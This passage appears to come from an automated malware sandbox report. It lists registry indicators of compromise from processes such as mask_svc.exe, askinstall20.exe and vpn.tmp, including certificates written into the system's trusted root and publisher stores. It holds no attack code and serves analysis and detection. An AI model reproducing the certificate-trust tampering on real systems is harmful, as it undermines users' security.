Settings\MuiCache\16\52C64B7E\@tzres.dll,-231 = "Hawaiian Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-31 = "Mid-Atlantic Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-461 = "Afghanistan Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-592 = "Malay Peninsula Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1502 = "Turkey Standard Time" mask_svc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1801 = "Line Islands Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-41 = "E. South America Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-331 = "E. Europe Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2591 = "Tocantins Daylight Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2142 = "Transbaikal Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-672 = "AUS Eastern Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time" mask_svc.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdge.execmd.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exesvchost.exeguihuali-game.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus cmd.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\propapps.info\NumberOfSubdoma = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{K2A7A3K0-ECRB-LM0G-2M91-3G19BV5P5669}\1 = "6124" svchost.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersio = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\LastClosedHeight = "600" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 22c3dd375d28d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\propapps.info MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\propapps.info\NumberOfSubd = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 010000005d45702fad8259143bc7d3118606b35f35235b823239011832b3e3b66411ae703e93191ec238a46ad4c318964baff270aa4940d5bc650164ec4cb7781fe4a9d51a3ab21c5ae48d684ee2a72fd0f4d16f2c995decf117b08fb2571faf78644af457da2eb2c1a4cf2176c112a31ef7cc0869b1b3c4886e5b912b73089d42b1128cfd12ac0bcc9920cb5f011ed9a6d6b931d132e3d3508a1f0eba3fd54c2deb6196e4845e015ae406a6fc42d38e18b38e780abd4a135d8bdc2c485d9d1316326cb6facf5ead71a3b13e98243caed0acea25e0f0e19ea69038b90e6c83246ba6c18a8493b592e6f7cef69547c79b7be3d32a486de7e5a8bb6c9bcb0bb932626773c29d706852ec0023e4ff4b5229b276d0e401d264664a2b37995cdcc0221d959103ab0603f45ddf23fc40d10c582d87aeaab4c093fd4b00d06c7a7eccce1150d3a752f5d9bb41b2d88e3c777de7b734093022d857c7545afe28b19051d809b8504073dd4d8e8b9a9e143ade15eb259f5ab5ccb87d89ad58a9eb19b4e48af0edf4f14e5e39ea79b8904cfca6e07a9be6b40413020fb49e1cb9e669dd28bdc92056d7532fb64b674e MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings guihuali-game.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\propapps.info\NumberOfSubdoma = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.propapps.info MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000 cmd.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe -
Processes:
askinstall20.exeh3adlpt0ixf.exevpn.tmptapinstall.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B h3adlpt0ixf.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d83494558973569